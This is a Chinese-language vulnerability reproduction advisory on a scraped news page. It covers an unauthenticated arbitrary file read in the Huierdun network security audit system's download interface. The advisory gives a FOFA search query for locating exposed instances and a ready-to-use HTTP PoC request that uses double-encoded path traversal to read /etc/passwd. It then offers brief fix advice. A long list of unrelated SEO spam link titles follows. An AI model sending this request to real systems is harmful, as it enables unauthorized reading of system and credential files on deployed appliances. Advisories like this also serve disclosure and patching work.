当前位置: 首页 > news >正文

网站安全风险提示单常德网站优化推广

网站安全风险提示单,常德网站优化推广,软件开发工程师工作条件,江苏中小企业建站价格0x01 产品简介 惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块&#xff1b…

0x01 产品简介

惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块;用户访问功能,内容过滤功能;流量控制功能、带宽管理功能;增强的应用安全扩展;强大的应用协议分析与报表功能。

0x02 漏洞概述

惠尔顿 网络安全审计系统download接口存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取系统内部敏感文件及凭证,使系统处于极不安全的状态。

0x03 影响范围

version <= v10

0x04 复现环境

FOFA:app="惠尔顿-网络安全审计系统"

0x05 漏洞复现

PoC

GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

读取 /etc/passwd 文件

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/376776/

相关文章:

  • 怎么做ppt教程网站精美的网页
  • 威海做网站优化做景观要知道哪些网站
  • 手机网站建设 cms始兴县建设局网站
  • 陕西手机网站制作无水印做海报的网站
  • 网站怎么连接微信支付电子商务网站建设与综合实践
  • 自适应网站制作简创网络营销服务公司
  • 网站建设氺金手指排名14徐州自助建站系统
  • 网站建设公司 保证完成 学的专业是编课 网站开发英语翻译
  • wordpress5.0启多站点网站死链检测
  • 网站制作的分割线怎么做外包app开发定制
  • 海南 网站开发安徽索凯特建设工程有限公司网站
  • 提供服务的网站seo网站架构
  • seo网站设计费用网站建设费用估计
  • 知名网站建设平台公司网上注册系统
  • 山西省网站建设备案表宠物店网站模板
  • 怎么做网站代理商素材中国官网
  • 网站开发制作价格企业网站定制多少钱
  • 设计专业知名企业网站昆山住房与城乡建设局官网
  • 外贸网站建设收益营销型网站传统网站
  • 最有性价比的网站建设沂源县建设局网站
  • 网站建设策划书ppt个人做外贸网站违法吗
  • 保定知名网站建设公司舟山网站建设seo
  • 可不可以异地建设网站网站建设的问题分析
  • 手机网站改app美区国区家庭共享
  • 长沙网站制作策划平度网站制作
  • 上海公司网站建设电话怎样建立营销网站
  • 网站建设公司的那些坑移动端快速排名
  • 湖南手机网站建设公司seo优化推广是什么意思
  • 工作的拼音长沙seo外包平台
  • 做蔬菜的网站有哪些做网站一般字号要做多少